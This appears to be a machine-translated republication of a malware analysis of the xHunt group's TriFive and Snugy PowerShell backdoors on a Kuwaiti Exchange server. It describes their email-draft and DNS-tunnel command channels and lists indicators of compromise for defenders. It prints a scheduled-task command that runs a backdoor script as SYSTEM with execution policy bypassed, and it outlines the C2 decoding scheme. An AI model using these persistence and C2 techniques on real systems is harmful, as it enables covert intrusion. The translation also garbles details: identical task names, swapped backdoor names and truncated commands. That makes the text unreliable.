Shulou(Shulou.com)05/31 Report--

This article will explain in detail the example analysis of TriFive and Snugy backdoor. The editor thinks it is very practical, so I share it with you as a reference. I hope you can get something after reading this article.

Words written in the front

XHunt activities have been active since July 2018, and the organization is mainly targeting the government of Kuwait and shipping organizations. Recently, researchers found that xHunt attackers attacked the Microsoft Exchange server of an institution in Kuwait. Although we cannot confirm how the attacker hacked into the Exchange server, based on the timestamp of the creation of scheduled tasks related to this incident, we found that the attacker was able to access the Exchange server long before August 22, 2019. In this activity, the attacker uses two backdoors, one is TriFive, and the other is a variant of Snugy (this is a Web Shell, which we call BumbleBee).

The TriFive and Snugy backdoors are essentially PowerShell scripts that help attackers access the compromised Exchange server and use different C2 channels for communication. The TriFive backdoor uses an e-mail-based channel that uses Exchange Web Services (EWS) to create message drafts in deleted mail folders of hacked e-mail accounts. The Snugy backdoor uses the DNS tunnel to achieve command control.

TriFive and Snugy back door

In September 2020, we found that xHunt attackers had invaded an organization in Kuwait. There is a behavior on the organization's Exchange server that can execute commands through the IIS process w3wp.exe. When sending these commands, the attacker uses a Web Shell called BumbleBee, which has been installed on the infected Exchange server. When we analyzed the server logs, we found two scheduled tasks created by an attacker, both of which run malicious PowerShell scripts. We are not sure whether the attacker used any of these PowerShell scripts to install webshell, but we believe that the attacker accessed the Exchange server before logging the event.

The attacker created two tasks, ResolutionHosts and ResolutionHosts, on this Exchange server, both of which were created in the c:\ Windows\ System32\ tasks\ Microsoft\ Windows\ WDI folder. By default, this folder also stores a legitimate ResolutionHost task on the Windows system, as shown in the following figure. The legitimate ResolutionHost task is associated with the Windows Diagnostic Infrastructure (WDI) resolution host and is primarily used to provide interactive troubleshooting of problems that occur on the system. We believe that attackers choose this task name mainly to hide their attacks.

On August 28, 2019 and October 22, 2019, attackers created ResolutionHosts and ResolutionHosts tasks to run two separate PowerShell-based backdoors. Attackers use these two scheduled tasks as persistence methods because the scheduled task runs the two PowerShell scripts repeatedly, but at different intervals. The following figure shows the two tasks and their associated creation time, run interval, and executed commands. The commands executed by these two tasks will attempt to run splwow64.ps1 and OfficeIntegrator.ps1, the backdoor and CASHY200 variants of what we call TriFive (we call it Snugy), respectively. These scripts are stored in two separate folders on the system, probably to prevent both backdoors from being discovered and deleted.

The figure also shows that the TriFive backdoor runs every 5 minutes, while the Snugy backdoor runs every 30 minutes. We cannot confirm the exact reason behind the interval difference, but it may have something to do with the concealment of the C2 channel associated with the back door. For example, Snugy uses a DNS tunnel as a C2 channel, so it may have a longer interval than TriFive, and Snugy uses a more obvious C2 channel than the email-based C2 channel used by TriFive, so it is more likely to be detected.

We cannot confirm at this time how the attacker created the ResolutionHosts and ResolutionHosts tasks. However, we know that when attackers install Snugy samples on other systems, they use batch scripts to create scheduled tasks named SystemDataProvider and CacheTask. For example, the following batch script will create and run a scheduled task named SystemDataProvider, and eventually run a Snugy sample named xpsrchvw.ps1:

Schtasks / create / sc MINUTE / mo 5 / tn "\ Microsoft\ Windows\ SideShow\ SystemDataProvider" / tr "powershell-exec bypass-file C:\ Windows\ Temp\ xpsrchvw.ps1" / ru SYSTEM & schtasks / run / tn "\ Microsoft\ Windows\ SideShow\ SystemDataProvider" TriFive back door

TriFive is a PowerShell backdoor that has never been discovered before, and xHunt attackers install it on an infected Exchange server and execute it every five minutes through a scheduled task. TriFive provides persistent backdoor access to Exchange servers by logging in to legitimate users' inboxes and obtaining PowerShell scripts from e-mail drafts in the deleted items folder. The TriFive sample uses the legitimate account name and credentials of the target organization, which also indicates that the attacker successfully stole the target's account credentials before installing the TriFive backdoor.

In fact, email-based C2 has also been used in the Hisoka tool, and although the Hisoka tool uses e-mail drafts to send and receive data, these drafts remain in the drafts folder, while the TriFive backdoor specifically saves its e-mail drafts to the deleted items folder.

In order to issue commands to the backdoor, the attacker needs to log in to the same legitimate email account and create a draft email with a subject of 555, which includes commands in encryption and Base64 encoding. The following figure shows an email with a demo command with a subject of 555 and a message of woFyeWt3cw==,. The script will be executed through PowerShell:

In order to run the commands provided by the attacker, the PowerShell script needs to log in to a legitimate e-mail account on the Exchange server and check the email with the subject 555 in the deleted items folder. The script opens the draft of the e-mail and uses Base64 to decode the contents of the body of the e-mail message, and then decrypts the contents of the decoding command by subtracting 10 from each character. The script then uses PowerShell's built-in Invoke Expression (iex) cmdlet to generate plaintext content. After executing the provided PowerShell code, the script encrypts the result by adding 10 to each character and Base64 encoding the ciphertext. Next, TriFive sends the result of the command to the attacker and sets the encoded ciphertext to the body of the draft e-mail message, which is saved in the deleted items folder with a subject of 555. The following figure shows a sample e-mail draft in the deleted items folder created by the TriFive script, which sends the running result of the command as a message with a subject of 555 and a message content of "bQB5AHgAfgB5AH0AeQBmAGsAbgB3AHMAeABzAH0AfgB8AGsAfgB5AHwA".

TriFive PowerShell scripts do not run persistently through a code loop, but rather through the previously mentioned ResolutionsHosts scheduling tasks.

Snugy back door

The OfficeIntegrator.ps1 file we saw in the ResolutionHosts task is an PowerShell-based backdoor, which we call Snugy, which allows an attacker to obtain the hostname of the target system and execute commands. Snugy is a variant of the CASHY200 backdoor, which has been used by attackers in previous xHunt activities. Trend Technology created a detection signature-Backdoor.PS1.NETERO.A for this backdoor in July 2019, indicating that this particular variant of CASHY200 has been around for more than a year.

The Snugy sample randomly selects the following domain names as its C2 domain names:

Hotsoft [.] icuuplearn [.] toplidarcc [.] icudeman1 [.] icu

Similar to earlier variants of CASHY200 backdoor, the Snugy variant uses the following command to connect to the custom domain name and attempts to resolve the domain before sending the ICMP request to the resolved IP address:

Cmd / c ping-n 1.

Snugy will use the following regular expression to extract the IP address from the result of the ping command:

\ b (?: 25 [0-5] | 2 [0-4] [0-9] | [01]? [0-9] [0-9]?) {3} (?: 25 [0-5] | 2 [0-4] [0-9] | [01]? [0-9] [0-9]?)\ b

The following is the command processing server for the Snugy backdoor:

The subdomain name created by Snugy contains a communication type field that defines the order of the elements in the data field. The following is the C2 domain name structure:

. Infrastructure related to xHunt

Intrusion threat indicator IoCTriFive sample:

407e5fe4f6977dd27bc0050b2ee8f04b398e9bd28edd9d4604b782a945f8120f

Snugy sample:

C18985a949cada3b41919c2da274e0ffa6e2c8c9fb45bade55c1e3b6ee9e1393 6c13084f213416089beec7d49f0ef40fea3d28207047385dda4599517b56e127 efaa5a87afbb18fc63dbf4527ca34b6d376f14414aa1e7eb962485c45bf38372 a4a0ec94dd681c030d66e879ff475ca76668acc46545bbaff49b20e17683f99c

Snugy C2 domain name:

Deman1 [.] icu

Hotsoft [.] icu

Uplearn [.] top

Lidarcc [.] icu

Sharepoint-web [.] com

Scheduled task name:

ResolutionHosts

ResolutionsHosts

SystemDataProvider

CacheTask-

This is the end of the article on "sample Analysis of TriFive and Snugy backdoor". I hope the above content can be helpful to you, so that you can learn more knowledge. if you think the article is good, please share it for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.